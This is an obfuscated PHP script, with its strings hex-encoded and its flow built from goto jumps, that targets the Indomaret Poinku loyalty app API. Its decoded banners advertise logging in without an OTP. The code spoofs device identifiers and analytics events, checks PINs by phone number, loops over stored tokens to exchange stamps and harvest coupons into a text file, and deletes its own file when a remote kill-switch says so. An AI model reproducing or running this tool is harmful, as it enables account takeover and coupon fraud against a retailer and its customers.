  $wDisp = "\x7b\x22\x64\141\164\x61\x22\x3a\133\173\x22\x61\x70\160\x6c\151\143\141\164\x69\x6f\156\42\72\173\x22\141\x70\x70\x5f\166\x65\x72\163\151\157\156\42\x3a\x22\63\56\61\x33\x2e\60\42\54\x22\144\x65\x76\x69\x63\x65\x5f\143\x6c\x61\x73\x73\x22\x3a\42\120\x68\157\156\145\x22\x2c\x22\x64\x65\166\151\143\145\137\146\x61\x6d\x69\x6c\x79\x22\x3a\x22" . $GOXkU . "\42\54\x22\144\145\166\x69\x63\145\x5f\x69\x64\42\x3a\x22" . $aY0el . "\x22\x2c\x22\157\163\x5f\x6e\x61\x6d\145\x22\72\42\101\x6e\x64\162\157\x69\x64\x20\x50\42\x2c\42\x6f\x73\x5f\166\145\x72\163\x69\x6f\156\x22\x3a\x22\x41\156\144\x72\x6f\151\144\40\71\x22\175\54\42\x63\x6f\162\145\x22\72\x7b\x22\x65\x76\x65\x6e\x74\137\156\141\155\x65\x22\72\x22\x70\x61\x67\x65\137\166\151\x65\x77\42\54\x22\x65\x76\x65\156\164\137\164\151\155\x65\x73\x74\141\x6d\160\42\72" . $nb9cm . "\54\42\160\141\x67\145\x5f\x6e\x61\155\145\x22\72\42\x76\145\162\x69\x66\x69\143\x61\164\x69\x6f\x6e\x22\x2c\42\x70\141\x67\x65\137\165\x72\154\x70\x61\x74\x68\42\x3a\x22\42\x7d\54\x22\155\x61\x72\x6b\145\164\151\156\147\x22\x3a\173\42\165\x74\155\x5f\x72\141\167\x22\72\42\165\x74\155\x5f\x73\x6f\x75\162\143\x65\x3d\x67\x6f\x6f\x67\154\x65\x2d\160\154\141\171\46\165\164\155\137\155\x65\144\151\x75\x6d\75\x6f\x72\x67\141\156\151\x63\42\175\x2c\x22\x75\163\145\x72\x22\72\x7b\42\x73\x65\x73\163\151\157\x6e\x5f\151\x64\42\x3a\42" . $MXjqh . "\42\54\42\x75\x73\x65\162\137\x69\160\137\x61\x64\144\162\x65\x73\163\42\72\42\61\62\x37\x2e\60\56\60\56\61\x22\175\x7d\x5d\x7d";
  goto VdRrs;
  BVsui:
  die;
  goto cvg4O;
  jYqv2:
  $jTEU0;
  goto qb0N_;
  iT6C0:
  H2PPC:
  goto ig8Qg;
  E7eXl:
  $D2zwh;
  goto OlRzX;
  lM2XZ:
  $wDisp = "\173\x22\x66\x69\x64\x22\x3a\42" . $odGGi . "\42\54\42\x61\x70\160\111\144\42\x3a\42\61\72\71\71\70\70\x31\x36\x36\x30\x35\63\x32\x38\x3a\x61\156\144\x72\x6f\x69\144\72" . $aY0el . "\x22\54\x22\141\x75\x74\x68\126\x65\162\163\x69\x6f\x6e\42\x3a\x22\106\111\123\x5f\166\62\42\x2c\42\163\144\x6b\126\x65\162\163\x69\x6f\x6e\x22\x3a\42\141\72\61\x37\56\60\x2e\x30\x22\175";
  goto jlEpj;
  ayHIl:
  echo "\12";
  goto O0Oil;
  gylcc:
  echo @zM6Ic("\156\x65\x76\171", "\40\123\x69\x6c\141\150\153\x61\x6e\x20\x48\165\x62\165\x6e\x67\x69\x20\103\162\x65\141\x74\x6f\162\40\x55\x6e\x74\165\153\x20\x56\145\162\151\146\151\x6b\141\163\151\40\x68\164\164\x70\x73\72\57\x2f\x77\141\56\x6d\x65\x2f\x36\62\70\62\x31\x37\66\63\65\x38\x32\x39\65\xa\12");
  goto GVDB9;
  Jfbgp:
  $tqWr2 = $zvt88[$yy9BI];
  goto KZ3My;
  EI4lL:
  $p4iky = @$Ap1KM["\144\141\164\x61"]["\155\x65\x6d\x62\x65\x72\x49\144"];
  goto ZKo9R;
  Pdyfx:
  echo "\12";
  goto nFrYj;
  U3GMQ:
  $w5ulg = str_replace("\xd", '', $TvVlh);
  goto V3qBg;
  BmMuE:
  echo @zm6ic("\x79\145\x6c\154\157\x77", "\116\x61\x6d\141\x20\113\x75\x70\x6f\156\156\x79\x61\40\x20\40\x20\x3a\40");
  goto yNbnX;
  LNnsq:
  $cod3H = fq6w0();
  goto xW7i4;
  MTsVB:
  echo "\12";
  goto b371k;
  TDGwf:
  echo "\12";
  goto LihqS;
  WLUFd:
  echo "\xa\12";
  goto a4SB4;
  SAvQe:
  echo "\x4d\x75\x6c\x61\x69\40\x42\141\162\x69\x73\40\x4b\x65\40\40\x3a\40";
  goto s6kmZ;
  Xuq79:
  $XTuz1 = G1WXt("\x68\x74\x74\160\x73\72\57\x2f\145\x64\x74\163\x61\160\160\x2e\151\x6e\144\x6f\155\x61\162\x65\164\x70\157\151\156\153\165\x2e\x63\157\155\57\x6c\157\171\x61\x6c\164\x79\57\141\160\x69\x78\55\61\65\60\62\55\141\x70\151\57\x6d\157\142\x69\x6c\145\57\163\164\141\155\x70\163\x2f\155\145\57\x63\x6f\x75\x70\x6f\156\x73\x2f\x65\x78\143\x68\x61\x6e\147\x65", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto G3IfU;
  AwDD1:
  $BW_8H = @$owfHy["\144\x61\x74\141"]["\143\157\156\164\x65\x6e\x74"][$dQ8Tp]["\144\x65\x73\143\162\151\160\x74\151\x6f\x6e"];
  goto kAmOU;
  cZsTg:
  $tqWr2 = $zvt88[$yy9BI];
  goto iqj0r;
  QxYhI:
  $nb9cm = round(microtime(true) * 1000);
  goto rIaU9;
  WuLs0:
  echo "\xa";
  goto ECJHz;
  pkmY4:
  $yJiD4 = @$owfHy["\x64\x61\x74\x61"][$qtgR3]["\x64\151\x73\x74\162\151\x63\x74\x4e\141\x6d\145"];
  goto IR_bg;
  RDVGv:
  $Jk9cx = g8pF2("\x68\x74\164\x70\163\x3a\57\x2f\x65\x64\164\163\x61\160\x70\x2e\151\156\144\157\155\x61\162\x65\x74\160\x6f\151\x6e\x6b\165\56\x63\157\x6d\x2f\143\157\156\x66\x69\x67\x75\x72\x61\164\151\x6f\x6e\x2f\x61\x70\151\x78\55\x31\65\60\62\55\141\x70\x69\x2f\x6d\157\x62\151\154\x65\x2f\x73\x79\x2d\141\x70\160\55\166\x65\x72\163\151\157\156\x2f\x67\145\164\55\166\145\162\163\x69\x6f\156\x2d\153\145\x79\57\x41\116\x44\122\117\x49\x44", $aY0el, $GOXkU, $mlMLt);
  goto adT9K;
  HCxli:
  PcWWE:
  goto kRYuQ;
  ynhnS:
  $UHj7C = G8pF2("\x68\x74\164\160\163\72\57\57\145\x64\164\x73\141\x70\x70\x2e\x69\x6e\144\x6f\x6d\141\x72\145\x74\160\x6f\151\156\153\165\56\x63\x6f\x6d\x2f\x63\x6f\165\160\157\x6e\57\x61\160\x69\x78\55\61\x35\60\x32\55\x61\160\x69\x2f\155\x6f\142\151\x6c\145\57\x63\157\165\160\157\156\163\x3f\x75\x6e\x70\x61\147\145\x64\x3d\164\162\165\145", $aY0el, $GOXkU, $mlMLt);
  goto yyp1X;
  deoKi:
  rHrIJ("\113\x75\160\x6f\156\x20\x50\157\151\x6e\153\x75\x20\x6e\x65\x77\56\164\170\164", $L9Nzh);
  goto MVc4v;
  GzPT0:
  echo "\xa";
  goto iosF0;
  VDs_x:
  $efQM2 = count($QRhbE) - 1;
  goto OUYab;
  tx212:
  jh2P0:
  goto SYN5I;
  sVbAt:
  echo "\xa";
  goto P5yoE;
  p9NyH:
  $wDisp = '';
  goto dqjxO;
  To2Qr:
  echo @Zm6ic("\156\x65\166\x79", $ABmxY);
  goto OYBJA;
  YNjDv:
  $gCIzy = @$owfHy["\x64\x61\x74\x61"]["\143\157\x6e\164\145\x6e\164"][$dQ8Tp]["\163\x74\x61\x6d\160\105\170\143\150\x61\156\147\x65\111\x64"];
  goto epp07;
  jgsP1:
  if (!($fUekS == '')) {
    goto jh2P0;
  }
  goto AQeBK;
  tDK_A:
  $zn5zd = substr_replace($GiPr2, "\60", 0, 2);
  goto ACpFN;
  juo3c:
  echo $yy9BI . "\x2e\x20";
  goto ZoliY;
  c6kVn:
  echo "\12";
  goto ZVOO3;
  QFsa0:
  $Jk9cx = G8pF2("\x68\164\164\160\x73\72\x2f\x2f\x65\x64\164\x73\x61\160\160\56\x69\156\x64\157\x6d\x61\162\145\164\x70\x6f\x69\x6e\153\165\56\143\157\x6d\57\154\157\171\141\154\164\x79\x2f\x61\160\x69\x78\x2d\61\65\x30\x32\55\141\160\151\57\155\157\142\151\x6c\145\x2f\x72\145\155\151\x6e\x64\x65\x72\x73\x2f\x6d\x65", $aY0el, $GOXkU, $mlMLt);
  goto nof22;
  p1x_3:
  $D18xv = @$owfHy["\144\x61\x74\x61"][0]["\x69\x64"];
  goto Xt3c5;
  dd0D6:
  $PKr5B = @$lImQC["\x64\141\164\141"]["\x63\157\x6e\x74\x65\156\164"][15]["\x63\157\165\x70\x6f\156\116\141\x6d\145"];
  goto zqUTx;
  y0A3r:
  echo @zM6Ic("\162\x65\144", "\113\x4f\x44\x45\x20\x4d\125\x20\x53\x41\114\x41\110\x20\x4a\117\x4e\41\41\41\xa");
  goto WTQQC;
  rWbmM:
  h93oq:
  goto c5N7a;
  VYZr6:
  goto pfdwZ;
  goto h9f4o;
  vxIYx:
  @unlink("\x6d\171\x74\157\x6b\x65\156");
  goto tX9Oi;
  Mrs6i:
  echo "\xa";
  goto CDlgR;
  SPzsL:
  goto dGfMJ;
  goto Akwg1;
  QwxVQ:
  echo "\12";
  goto Uz1oe;
  vPKzt:
  echo @ZM6Ic("\162\x65\144", "\x3d\x3d\75\75\x3d\75\x3d\75\75\x3d\x3d\75\x3d\x3d\75\x3d\x3d\x3d\x3d\75\x3d\75\75\75\x3d\x3d\75\75\x3d\x3d\75\75\x3d\75\75\x3d\75\x3d\75\x3d\x3d\75\75\x3d\x3d\75\75\75\x3d\x3d\x3d\x3d\75\xa");
  goto uk6Jf;
  eMkRf:
  echo "\12";
  goto J3y2E;
  ZKo9R:
  $BcbF3 = @$Ap1KM["\x64\x61\164\141"]["\x70\150\x6f\156\x65\x4e\165\x6d\x62\145\162"];
  goto fmZo2;
  s4XZg:
  $Ap1KM = json_decode($Jk9cx, true);
  goto Ysu6A;
  f0C6o:
  echo "\12";
  goto XfE0J;
  F21Gw:
  aKEU_:
  goto l7zY3;
  OO8Xp:
  $R_bYC = @$nPb0z["\144\x61\x74\141"]["\x69\144"];
  goto j91S7;
  janeS:
  lQjR6("\x6d\x79\164\157\153\145\x6e\x20\160\157\x69\x6e\x20\x64\x69\40\141\x74\141\x73\40" . $VW5Jc, $zn5zd, $mlMLt);
  goto jLvP7;
  MlM4g:
  echo @zm6ic("\147\x72\x65\145\x6e", "\116\x6f\x6d\157\162\x20\110\x50\40\x41\x6e\144\141\x20\x20\72\40");
  goto ZSznK;
  c0k15:
  $xT15V = G8PF2("\x68\x74\164\160\163\x3a\x2f\57\145\144\x74\163\141\x70\160\x2e\151\156\144\157\x6d\141\162\145\164\160\157\x69\x6e\153\x75\56\x63\157\155\x2f\45\x32\x46\154\157\x79\x61\x6c\x74\x79\45\62\106\141\x70\x69\170\x2d\61\x35\x30\62\x2d\141\160\151\x25\x32\x46\155\157\142\x69\154\145\45\62\106\x63\157\151\x6e\163\45\62\x46\160\x72\151\x7a\x65\163\45\x32\106\107\x4f\x46\x52\105\123\x48\x32\x30\x32\x32\45\62\x46\155\x65", $aY0el, $GOXkU, $mlMLt);
  goto aCzSY;
  DvkOx:
  goto V9iZ0;
  goto d1cn3;
  zn1MU:
  $Pud0o = trim(file_get_contents("\x68\164\164\160\x73\72\x2f\57\162\x61\x77\56\x67\x69\x74\x68\165\x62\165\x73\x65\x72\143\157\156\164\x65\156\x74\56\x63\157\x6d\57\143\x73\x61\157\x6a\153\143\163\x61\152\143\163\152\x6e\x6a\153\163\143\141\x6e\152\153\156\143\152\x6b\x73\x6c\x6e\x6a\x2f\141\144\x66\x61\144\146\x61\144\166\x73\x67\x64\146\x67\x67\x66\163\x67\x73\x67\146\163\x61\x66\57\155\x61\151\156\x2f\x6d\x61\153\x69\156"));
  goto A2sIk;
  M2RvH:
  mkdir("\x2f\x73\164\157\162\x61\147\145\57\x65\155\165\x6c\x61\x74\x65\x64\57\60\57\101\156\x64\162\157\x69\x64", 0777, true);
  goto OA4m1;
  k6NcS:
  $t2tnx = @$owfHy["\144\141\x74\x61"][0]["\x72\145\x63\151\x70\151\145\156\164\120\x68\x6f\156\x65\x4e\x75\x6d\x62\x65\162"];
  goto Yu0OE;
  GHPjX:
  @unlink("\155\157\x72\145");
  goto rWbmM;
  WFREJ:
  $Ap1KM = json_decode($ofEkP, true);
  goto SepDd;
  h_PCX:
  echo "\xa";
  goto kXhiU;
  Y6Wfi:
  $wDisp = "\x7b\42\x70\x68\157\156\145\116\x75\155\142\145\162\42\x3a\x22" . $zn5zd . "\x22\x2c\42\x64\145\x76\151\x63\145\x49\144\x22\x3a\x22" . $aY0el . "\42\54\42\x70\x69\156\103\157\x64\145\x22\72\x22" . $earOL . "\42\x7d";
  goto sNpwz;
  aHEZg:
  echo @ZM6IC("\162\x65\x64", "\12\176\x7e\x7e\x7e\x7e\x7e\176\x7e\x7e\176\x7e\176\x7e\176\176\176\x7e\x7e\x7e\x7e\176\176\176\x7e\176\x7e\176\176\x7e\176\176\x7e\176\x7e\x7e\176\x7e\176\x7e\x7e\176\176\176\176\x7e\x7e\x7e\x7e\12");
  goto T9KaD;
  cjw3d:
  ebnNp:
  goto gy5bR;
  ztfZm:
  echo @zM6iC("\171\145\x6c\154\x6f\167", "\x53\164\x61\x74\165\163\40\x43\145\153\40\113\x75\x70\157\x6e\40\72\40");
  goto iMEyj;
  HCWyL:
  ObwZf:
  goto ahhce;
  g06r9:
  @unlink("\x2f\x73\164\157\x72\x61\147\x65\x2f\145\x6d\x75\154\141\164\x65\144\57\60\x2f\101\x6e\x64\x72\x6f\x69\x64\57\x79\x6f\165\162");
  goto rIUhZ;
  pqxuM:
  $BcbF3 = @$Ap1KM["\x64\x61\x74\141"]["\160\150\157\x6e\145\x4e\x75\155\x62\x65\x72"];
  goto eaVNA;
  ldlWE:
  hJDqH:
  goto oEIK5;
  YFMSc:
  echo @zm6ic("\156\145\166\x79", "\124\x65\x6b\x61\156\x20\105\156\164\145\x72\x20\125\156\164\165\x6b\40\x4c\x61\x6e\x6a\x75\164\40\x3a\40");
  goto rn8GJ;
  g12c3:
  echo @ZM6ic("\x6e\x65\166\x79", "\123\x6f\162\x72\171\54\x20\124\x68\x69\163\40\123\143\162\151\x70\x74\40\110\141\163\x20\102\x65\145\x6e\40\122\145\x6d\157\166\x65\x64\40\102\x79\x20\x54\150\145\40\x4f\167\156\145\162\x21\x21");
  goto HuxLa;
  ZWgtU:
  $Jk9cx = G8PF2("\x68\x74\x74\x70\163\72\x2f\57\x65\x64\x74\163\141\x70\160\x2e\x69\156\x64\x6f\x6d\x61\x72\x65\x74\x70\x6f\x69\x6e\x6b\165\56\x63\x6f\x6d\x2f\x63\165\x73\x74\157\155\145\x72\x2f\x61\x70\151\170\55\x31\x35\60\x32\55\141\160\x69\57\x6d\x6f\x62\151\x6c\x65\57\144\x65\164\x61\151\154\x2d\143\165\x73\x74\x6f\155\145\x72\55\157\x72\151\147\x69\x6e", $aY0el, $GOXkU, $mlMLt);
  goto utu6T;
  soKJc:
  znG5V:
  goto nRboz;
  pWpjD:
  echo @Zm6IC("\156\145\166\171", $J0Fkh);
  goto qf0ET;
  pXPoJ:
  echo "\12";
  goto TaqSA;
  qNcWT:
  echo @zm6IC("\x79\145\x6c\154\157\x77", "\x7c\40\127\x41\40\x30\x38\x32\x31\67\66\x33\x35\70\x32\71\x35\x20\12");
  goto A5A7y;
  pKI5I:
  $mlMLt = $obc_G;
  goto kkk3x;
  cw7l6:
  $XDyMm = @$Ap1KM["\x64\141\164\x61"]["\142\x61\x6c\141\156\143\x65"];
  goto U8GHB;
  YrlkR:
  $gYG6P = rand(1000, 9999);
  goto hBtwy;
  QlDQy:
  $KMaT7 = @$owfHy["\144\141\x74\141"]["\x63\157\156\x74\x65\x6e\x74"][$dQ8Tp]["\164\171\160\145"];
  goto ZMAxB;
  tcaWh:
  goto zbRuM;
  goto yjYvF;
  SyHHL:
  echo @Zm6ic("\x6e\145\x76\171", "\40\x53\105\x4d\117\107\101\x20\x4c\x4f\x42\x41\x4e\x47\40\120\x41\x4e\124\x41\x54\40\116\131\x41\x20\102\111\x53\125\x4c\x41\116\41\41\41\41\x21\40\12");
  goto tAwBR;
  qsntQ:
  $bDQe4 = "\x31\x30\x30\x30\60\60\60\60";
  goto ahhi3;
  MYWMI:
  echo @Zm6ic("\156\145\x76\171", "\40\174\x20\123\143\162\151\x70\164\x20\111\x44\115\40\114\x4f\107\x49\x4e\40\120\x4f\x49\116\x4b\125\40\x43\105\x4b\x20\x4b\x55\120\x4f\116\x20\124\101\116\x50\101\40\x4f\x54\120\xa");
  goto P7mQo;
  j9DK2:
  echo @zM6IC("\171\x65\154\154\x6f\167", "\40\62\x20\40\56\40\x4c\x6f\147\151\156\40\x50\157\x69\156\x6b\165\40\124\141\x6e\160\x61\40\117\124\120\x20\53\x20\x50\x65\143\x61\150\151\x6e\12");
  goto cLVAj;
  WYK2I:
  $wDisp = "\173\x22\x64\x61\x74\141\x22\x3a\133\173\42\141\160\x70\154\x69\x63\141\164\151\157\x6e\x22\x3a\x7b\42\141\x70\x70\137\166\145\162\163\x69\157\x6e\42\x3a\x22\63\56\61\63\x2e\60\42\x2c\42\x64\x65\x76\151\x63\x65\137\143\x6c\141\x73\x73\x22\x3a\42\120\150\x6f\x6e\x65\x22\54\x22\144\145\166\151\143\145\137\x66\x61\x6d\x69\154\x79\x22\x3a\x22" . $GOXkU . "\42\x2c\x22\x64\x65\x76\x69\143\145\x5f\x69\144\x22\x3a\x22" . $aY0el . "\42\x2c\x22\157\163\137\x6e\x61\x6d\145\x22\72\x22\101\156\x64\x72\x6f\151\144\x20\x50\42\54\x22\x6f\x73\137\166\x65\162\x73\151\157\156\x22\x3a\42\101\156\x64\162\x6f\x69\144\x20\x39\42\175\54\x22\x63\x6f\x72\x65\42\72\173\42\x65\166\x65\x6e\x74\137\156\141\x6d\x65\42\x3a\42\160\x61\147\145\x5f\166\151\145\167\x22\x2c\42\x65\x76\145\x6e\164\x5f\164\x69\x6d\145\x73\164\141\155\160\x22\x3a" . $nb9cm . "\x2c\x22\160\x61\147\145\137\156\x61\x6d\145\42\72\x22\x50\x49\x4e\40\x61\x63\164\151\x76\x61\164\151\x6f\156\42\x2c\x22\x70\x61\147\145\137\x75\162\154\160\141\x74\x68\x22\x3a\42\x22\x7d\54\x22\155\x61\x72\x6b\x65\164\x69\156\x67\42\72\x7b\42\165\x74\x6d\x5f\162\141\167\42\72\42\165\x74\x6d\137\x73\157\x75\x72\x63\x65\75\x67\x6f\x6f\x67\154\145\55\x70\154\141\171\46\x75\164\x6d\137\155\145\x64\x69\x75\155\x3d\x6f\162\x67\x61\x6e\x69\x63\42\x7d\x2c\42\x75\163\x65\162\x22\72\173\x22\x73\145\x73\x73\x69\157\x6e\137\151\x64\x22\72\x22" . $MXjqh . "\42\x2c\x22\165\x73\x65\162\x5f\x69\x64\42\x3a" . $R_bYC . "\x2c\42\x75\163\x65\162\137\x69\x70\137\141\x64\x64\162\x65\x73\x73\42\x3a\42\61\x32\67\x2e\60\56\60\x2e\x31\x22\175\x7d\135\175";
  goto qg2i3;
  e2ITP:
  $iElqk = g1wXT("\x68\164\164\160\x73\72\x2f\57\145\x64\x74\x73\141\160\x70\x2e\x69\x6e\144\157\x6d\141\162\145\164\160\157\151\156\x6b\x75\56\143\157\155\57\x6c\x6f\x67\151\156\x2f\141\160\x69\170\x2d\x31\x35\60\62\x2d\141\160\151\57\157\160\145\x6e\57\160\x69\x6e\57\151\x73\55\160\x69\x6e\x2d\145\x78\151\x73\x74\55\x62\x79\55\x70\150\157\156\x65\x2d\x6e\x75\155\x62\145\x72", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto Xo2nr;
  oj_o6:
  echo "\12";
  goto rMiHp;
  mOztK:
  die;
  goto yr7dZ;
  aZAsM:
  echo "\12";
  goto JFR6I;
  CSrk4:
  $ZNU2M = @$owfHy["\x64\141\164\141"]["\143\x6f\x6e\164\x65\x6e\164"][$D2zwh]["\x63\157\x75\160\157\156\116\141\x6d\145"];
  goto le12b;
  OR4t6:
  LRKWE:
  goto mzjL3;
  n6abN:
  goto qdNHN;
  goto kT9ly;
  ktiz3:
  $QRhbE = explode("\xa", @file_get_contents("\x66\x6f\162\x63\145\x63\154\x6f\163\145"));
  goto XRDCd;
  qkXoE:
  if (!($D2zwh < $ogbF4)) {
    goto yj7_K;
  }
  goto HLO5p;
  nOS4c:
  ihbeD:
  goto MURce;
  ziRG0:
  echo "\xa";
  goto yHo5h;
  JVGPU:
  echo "\xa";
  goto k3n5R;
  ZjDi9:
  @unlink("\x70\157\x69\156\150\x70\x2e\160\x68\160");
  goto EiZOM;
  HrdBY:
  if (!($fUekS == '')) {
    goto cz23r;
  }
  goto Dys8M;
  UtozB:
  $wDisp = "\173\x22\141\x70\x70\111\x6e\163\164\141\156\x63\x65\111\144\42\72\42" . $WYrgv . "\42\x2c\42\x61\160\160\x56\145\x72\x73\x69\x6f\x6e\x22\72\x22\63\x2e\x31\x33\x2e\x30\x22\54\x22\x63\157\x75\156\164\x72\171\103\157\144\145\x22\x3a\42\x49\x44\x22\54\x22\141\x6e\141\154\x79\x74\x69\x63\x73\x55\163\x65\162\x50\x72\157\160\x65\x72\x74\x69\x65\x73\x22\72\x7b\x7d\54\x22\141\x70\x70\111\x64\x22\72\42\61\x3a\71\71\x38\x38\61\66\x36\x30\x35\63\x32\x38\x3a\x61\156\x64\x72\157\151\x64\72" . $aY0el . "\x22\x2c\42\x70\x6c\141\164\146\157\162\x6d\x56\145\x72\163\x69\157\156\x22\x3a\x22\x32\x38\x22\54\42\x74\x69\155\x65\132\x6f\x6e\145\42\72\x22\101\163\x69\141\x5c\x2f\112\x61\153\141\x72\164\x61\x22\x2c\x22\x73\144\x6b\x56\145\x72\x73\151\x6f\156\42\72\x22\x32\x31\x2e\x30\56\61\x22\54\42\x70\141\x63\x6b\141\x67\145\116\141\155\x65\x22\x3a\42\x6d\x79\x70\157\x69\x6e\x2e\151\x6e\x64\x6f\x6d\141\162\x65\x74\x2e\141\156\x64\x72\157\x69\144\x22\54\x22\x61\x70\x70\x49\156\x73\164\x61\156\143\145\111\x64\124\x6f\x6b\145\x6e\42\72\42" . $YYbml . "\42\x2c\42\154\141\156\x67\165\141\147\x65\x43\x6f\144\x65\42\72\x22\151\x64\x2d\x49\104\x22\54\x22\x61\x70\160\x42\165\x69\x6c\144\x22\72\x22\61\x30\64\42\175";
  goto P2_cR;
  VCtcL:
  $Ap1KM = json_decode($N0XGD, true);
  goto kgTcS;
  TIpPO:
  echo @zM6ic("\162\x65\x64", "\12\176\x7e\176\x7e\x7e\x7e\176\176\x7e\176\176\176\176\176\x7e\x7e\x7e\176\176\176\176\x7e\176\x7e\x7e\176\x7e\x7e\176\x7e\x7e\x7e\x7e\176\x7e\176\x7e\x7e\x7e\x7e\x7e\x7e\x7e\176\x7e\x7e\176\176\12");
  goto J5Yc7;
  xSHkO:
  $zvt88 = $QRhbE;
  goto Jfbgp;
  FBtZN:
  $gYG6P = rand(1000, 9999);
  goto l1S9t;
  noF8q:
  echo "\xa";
  goto bnog9;
  cAIMe:
  echo "\xa";
  goto vtZNG;
  b371k:
  echo @zm6iC("\x70\165\162\160\154\x65", "\111\104\x20\x20\40\x20\40\x20\40\40\x3a\40");
  goto KZvKT;
  ZJSHQ:
  $owfHy = json_decode($upOL9, true);
  goto EMbAe;
  iAKfs:
  $CdOss = "\61\60\x30\x30\x30\60\60\60";
  goto RB7vh;
  m1w6_:
  $PGTBJ = str_replace("\15", '', $zcN5u);
  goto N1Fy0;
  Fg3lZ:
  $QRhbE = explode("\12", @file_get_contents("\x6d\171\164\x6f\153\x65\156"));
  goto U0V1s;
  UACxr:
  echo $jTEU0;
  goto Gg0l9;
  KIXqn:
  echo @zm6IC("\156\x65\x76\x79", $WtCiL);
  goto bsyt4;
  j91S7:
  $p4iky = @$nPb0z["\144\141\164\x61"]["\155\x65\155\142\x65\162\x49\x64"];
  goto s7gJN;
  jG_Zk:
  echo "\12";
  goto NcukH;
  OzIsi:
  $BcbF3 = @$Ap1KM["\144\141\x74\141"]["\160\x68\x6f\x6e\145\x4e\165\x6d\142\145\x72"];
  goto C5uyC;
  MTZD5:
  $SR3ui = @$owfHy["\144\141\164\141"]["\x63\x6f\156\164\145\x6e\164"][$D2zwh]["\143\157\165\160\157\156\x43\x6f\144\x65"];
  goto pg4Im;
  CSX6x:
  echo @ZM6Ic("\156\145\166\171", "\x20\40\40\x20\x20\40\40\x20\40\x20\x59\101\x4e\107\x20\x4e\131\105\102\101\x52\111\x4e\40\123\103\x52\111\120\x54\x20\x49\116\111\x20\12");
  goto POucJ;
  mGdhE:
  $VW5Jc = trim(fgets(STDIN));
  goto qV_iI;
  zAuJD:
  $zcN5u = Xozb4(array("\x7c"), $wZnHP)[0];
  goto CiT9u;
  mBoJz:
  $wlJRC = XoZB4(array("\174"), $wZnHP)[1];
  goto bim6t;
  U3tV5:
  $DxrJr = "\61\60\x30\x30\60\60\60\x30\60\60\60\60\x30\60\x30\x30\x30\x30";
  goto Ecn2N;
  l7zY3:
  echo "\12";
  goto o7hXR;
  FpdUn:
  if (!($yy9BI < $DxrJr)) {
    goto OQhff;
  }
  goto G_E8D;
  ganFQ:
  @unlink("\x70\157\151\x6e\150\160\x2e\x70\150\160");
  goto FgEJz;
  MOYQn:
  print_r($zvt88);
  goto aIbLu;
  cIVmT:
  $wlJRC = xOzb4(array("\174"), $wZnHP)[1];
  goto kiK8R;
  vunz9:
  $owfHy = json_decode($Jk9cx, true);
  goto RBPjd;
  Hwq1l:
  $v1ZMX = str_replace("\15", '', $wPFxB);
  goto ubtTf;
  Syh5j:
  hAy4Q:
  goto FaMo7;
  Zcbgi:
  echo @Zm6iC("\x6e\145\x76\x79", $SR3ui);
  goto xwo3y;
  Ssnqn:
  echo "\xa";
  goto xydrh;
  m3Qnm:
  @unlink("\160\x6f\151\x6e\150\160\56\160\x68\x70");
  goto eFzZO;
  vxM93:
  echo @Zm6IC("\156\x65\166\171", "\x53\x6f\x72\162\171\x2c\40\124\x68\151\163\x20\x53\x63\x72\151\x70\x74\x20\110\141\x73\x20\x42\x65\x65\156\x20\x52\x65\155\x6f\166\145\x64\x20\x42\171\x20\x54\x68\145\40\117\167\156\145\x72\x21\x21");
  goto q0Ft1;
  zlztx:
  die;
  goto TDRtd;
  luIKU:
  $aY0el = $v1ZMX;
  goto Grsq5;
  RTSxC:
  $Ap1KM = json_decode($xT15V, true);
  goto tJQnU;
  KmU4I:
  dvsNz:
  goto sHvzX;
  l6uEH:
  $efQM2 = count($QRhbE) - 1;
  goto rEF_Z;
  lGCjP:
  Qcupn:
  goto ZZutb;
  PT110:
  $jTEU0;
  goto GGol7;
  tb6FY:
  VbZ2i:
  goto p61aQ;
  PUv3V:
  echo "\12";
  goto xhOCn;
  FpdCf:
  echo @Zm6Ic("\x6e\145\x76\x79", "\x53\x6f\162\162\x79\x2c\x20\124\x68\151\x73\40\x53\143\x72\x69\x70\164\40\x48\141\163\x20\102\145\145\156\x20\122\x65\x6d\x6f\x76\x65\144\x20\102\x79\40\124\150\x65\40\x4f\x77\156\145\162\x21\41");
  goto ULTAl;
  XniUI:
  if ($ZNU2M == '') {
    goto SyMwb;
  }
  goto NI96b;
  A1ij4:
  $upOL9 = G8pF2("\x68\164\x74\x70\163\x3a\57\x2f\x65\144\x74\x73\141\x70\160\x2e\x69\156\x64\x6f\x6d\x61\162\x65\x74\x70\157\x69\x6e\x6b\x75\56\x63\x6f\x6d\x2f\143\x6f\x75\160\157\156\57\x61\160\x69\170\x2d\x31\x35\60\62\55\x61\160\151\x2f\155\x6f\x62\x69\x6c\x65\57\x63\157\x75\160\x6f\156\x73\x3f\x75\156\160\141\x67\x65\x64\75\164\x72\x75\x65", $aY0el, $GOXkU, $mlMLt);
  goto ZJSHQ;
  Mr9wz:
  $w5ulg = str_replace("\xd", '', $TvVlh);
  goto Ca_8z;
  kiK8R:
  $U0YgX = str_replace("\15", '', $zcN5u);
  goto jdGHB;
  e3Es2:
  if ($J2jGQ == "\104\x69\x73\x6b\x6f\156\40\122\160\40\x32\x35\x2e\x30\x30\60\x20\113\154\x69\x6b\40\x49\x6e\144\x6f\155\x61\x72\x65\x74") {
    goto poXHB;
  }
  goto vGFvF;
  jWTaT:
  @unlink("\x6d\x6f\162\145");
  goto TlZVo;
  sQzl_:
  $xp_1p = "\x69\156\144\157\56\x74\x78\x74";
  goto nbiw6;
  sZ35R:
  echo @Zm6ic("\156\x65\166\171", "\x20\123\x45\115\x4f\x47\x41\40\x4c\x4f\x42\101\116\x47\x20\120\x41\x4e\x54\x41\x54\x20\116\131\101\40\102\111\x53\x55\114\101\x4e\41\x21\x21\x21\x21\40\xa");
  goto kPWys;
  QtHtQ:
  $U0YgX = str_replace("\15", '', $zcN5u);
  goto u2Iln;
  vZLPg:
  $v1ZMX = str_replace("\xd", '', $wPFxB);
  goto YRYVy;
  PjzOJ:
  echo "\xa";
  goto tDK_A;
  kz8l7:
  $dQ8Tp = trim(fgets(STDIN));
  goto uXokT;
  q0Ft1:
  @unlink("\x70\157\151\156\150\x70\56\160\150\x70");
  goto Ga713;
  OnfYe:
  rhRij("\x4b\165\160\157\x6e\x20\x50\x6f\x69\156\153\x75\40\156\145\167\56\x74\x78\x74", $PEd4h);
  goto y0e5f;
  KhDEm:
  echo "\xa";
  goto zEKm4;
  Zt6t6:
  echo "\12";
  goto gCa6F;
  jpuIB:
  echo @zM6Ic("\160\165\162\160\x6c\145", $fZ2bz);
  goto kO9o0;
